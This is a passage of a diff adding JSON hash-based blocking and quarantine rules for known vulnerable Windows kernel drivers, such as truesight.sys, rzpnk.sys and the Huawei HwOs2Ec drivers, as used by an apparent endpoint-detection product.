+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.495237Z",
+ "creation_date": "2026-03-23T11:45:31.495240Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.495247Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "05888befb804daaf7f67e4cf96c366469b49aee0ca3bf4956295d13db533bfa8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d8b96539-af8a-5cdb-b242-bbba819f7232",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.479944Z",
+ "creation_date": "2026-03-23T11:45:31.479956Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.479965Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9f6c870efde4f827da6bb59eb88004eab884f743049eea246cfe18b36585f675",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d8ba2ba1-0832-5d47-b025-69a310dd8a2e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.606174Z",
+ "creation_date": "2026-03-23T11:45:29.606176Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.606181Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "86721ee8161096348ed3dbe1ccbf933ae004c315b1691745a8af4a0df9fed675",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d8d38a5f-d117-50e0-9fe4-d06c9bebfe8a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.980430Z",
+ "creation_date": "2026-03-23T11:45:29.980432Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.980437Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0c925468c3376458d0e1ec65e097bd1a81a03901035c0195e8f6ef904ef3f901",
+ "comment": "Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d8dfcaf3-26a0-5fe2-b99b-3bfdacfa07a8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.140456Z",
+ "creation_date": "2026-03-23T11:45:31.140458Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.140464Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "30dd053068d60984939e7af6a11d9d0ee2183ba92c7d389f6b2dc71cebc19e22",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d8e44420-94f9-5b81-ac89-e9f596a6d793",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.816317Z",
+ "creation_date": "2026-03-23T11:45:31.816320Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.816328Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "642478e28630c0f0d02526643315ac855bfb93ac347d8624883f92b6ec51623d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d8fd6855-788c-5997-ac51-3578201c6a96",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.605909Z",
+ "creation_date": "2026-03-23T11:45:29.605911Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.605917Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c88b23dc0bdeeb244c125825865a7a8d9ef04ba4d62ecdd032c77dc6b6733ead",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d9091cca-e0fc-555a-a5e3-0c6675b042fa",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.481523Z",
+ "creation_date": "2026-03-23T11:45:30.481527Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.481536Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0d133ced666c798ea63b6d8026ec507d429e834daa7c74e4e091e462e5815180",
+ "comment": "Vulnerable Kernel Driver (aka rtif.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d9312b7e-aa4e-5cdb-ad4f-d4a43a58571a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.826225Z",
+ "creation_date": "2026-03-23T11:45:30.826228Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.826233Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5652485eaad1e1a7256ce6e1c36f82ed449fc195cb892142705a783ba5a307eb",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d942b78d-b406-5159-89b1-f2034af0b065",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.616415Z",
+ "creation_date": "2026-03-23T11:45:29.616417Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.616423Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b95b2d9b29bd25659f1c7ba5a187f8d23cde01162d9b5b1a2c4aea8f64b38441",
+ "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d945a062-6caa-5d1d-b45d-e7fc2ade1d7c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.494382Z",
+ "creation_date": "2026-03-23T11:45:31.494385Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.494394Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bb2ce27cd66ef89d1de4b9499425006efdd0e254b8ff5cc3c5c396d0e07f3a04",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d946f879-9e3b-594c-9298-50cf1aa53361",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.812926Z",
+ "creation_date": "2026-03-23T11:45:31.812928Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.812933Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "053d2510fbed9c2a60e5a2f25de9bdc2e1b01a363d83fa02c9aeb6571f660575",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d95d6a86-6087-59c4-94ae-0e84cb553a45",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.827089Z",
+ "creation_date": "2026-03-23T11:45:30.827091Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.827097Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e08d61ef600c05c47a5645d2234d19bce845071837af412be7b1176452e9678a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d963b275-14db-55a4-a648-81d5c4c6065c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.978405Z",
+ "creation_date": "2026-03-23T11:45:29.978407Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.978413Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "881bca6dc2dafe1ae18aeb59216af939a3ac37248c13ed42ad0e1048a3855461",
+ "comment": "Vulnerable Kernel Driver (aka sandra.sys) [https://www.loldrivers.io/drivers/a7628504-9e35-4e42-91f7-0c0a512549f4/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d96a4fc1-b296-538e-82bc-03953659e08b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.494248Z",
+ "creation_date": "2026-03-23T11:45:31.494251Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.494259Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c30705b05d89f543270f98a40358968e8c8f3f00003b9a9a6876b0e2377b8880",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d977723a-352f-59a8-8a43-867ba899b9b6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.614023Z",
+ "creation_date": "2026-03-23T11:45:29.614026Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.614031Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ab494aba56e9ea7b6055ac437f6b678e7239b0fda54bf28019480565a098a6e3",
+ "comment": "Huawei vulnerable drivers (aka HwOs2Ec10x64.sys and HwOs2Ec7x64.sys) [CVE-2019-5241] [https://www.microsoft.com/security/blog/2019/03/25/from-alert-to-driver-vulnerability-microsoft-defender-atp-investigation-unearths-privilege-escalation-flaw/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d98b9fc4-3713-59b3-b95b-74cb80a82a5d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.474681Z",
+ "creation_date": "2026-03-23T11:45:31.474685Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.474694Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bf101fd701c0fe0e982f0bb75a6f641448ec5dc2cb60c75169d808a9b10ba996",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d9917880-8e25-572d-b415-d3dec4afa848",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.143835Z",
+ "creation_date": "2026-03-23T11:45:32.143837Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.143842Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "530d9223ec7e4123532a403abef96dfd1af5291eb49497392ff5d14d18fccfbb",
+ "comment": "Vulnerable Kernel Driver (aka wnbios.sys) [https://www.loldrivers.io/drivers/baa168cd-eba2-42e4-95e9-47cb4b2f9094/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d9a0f481-bd96-53bb-86fe-96278579bfb2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.482282Z",
+ "creation_date": "2026-03-23T11:45:31.482286Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.482296Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b3c04f73d74190d00a92d323a9aed827e662fee5c6bc512e9da29ec9761eb8d0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d9a90aae-c06d-5d04-83b0-cea0b47b1599",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.484056Z",
+ "creation_date": "2026-03-23T11:45:31.484060Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.484069Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "10f63e7e207c0dee86afec7673dc2ddd83cbde7b6551f6981b30e0e5d3e66dec",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d9b15516-3ce4-5525-8299-addada173a52",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.147752Z",
+ "creation_date": "2026-03-23T11:45:31.147754Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.147759Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6e11b2d91ca03bccba36b3e84267502fd37763f77c934dedac99074b314dd112",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d9b25515-41bf-5454-8c0c-3b8640236370",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.144736Z",
+ "creation_date": "2026-03-23T11:45:31.144738Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.144743Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "34478417edc805ad6ba9c3962208a46c3174aaba0b7c6e304ed77af70ee5ae5f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d9b68f89-5359-560c-a16e-f6118ef9c6a3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.481676Z",
+ "creation_date": "2026-03-23T11:45:30.481678Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
